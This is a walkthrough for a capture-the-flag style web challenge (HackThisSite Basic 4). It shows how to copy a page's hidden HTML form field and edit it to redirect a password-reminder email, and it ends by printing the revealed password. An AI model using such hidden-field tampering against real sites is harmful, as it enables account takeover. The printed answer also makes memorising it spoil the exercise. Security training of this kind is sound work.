An email script has been set up, which sends the password to the administrator. Requirements: HTML knowledge, an email address
Level 4
This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:
Solution:
- View page source code
- Find the HTML form for email notification
<form action="/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="webmaster@hulla-balloo.com" />
<input type="submit" value="Send password to Sam" />
</form> - Modify the form and save it into a file named "test.html"
<form action="http://www.hackthissite.org/missions/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="pwn@foo.org" />
<input type="submit" value="Send password to Sam" />
</form> - Use any browser to visit test.html.
- Press the button "Send password to Sam"
- There's a text on the page.
password: b314c515
- Back to the level page and submit the password.
- Congratulations, you have successfully completed basic 4!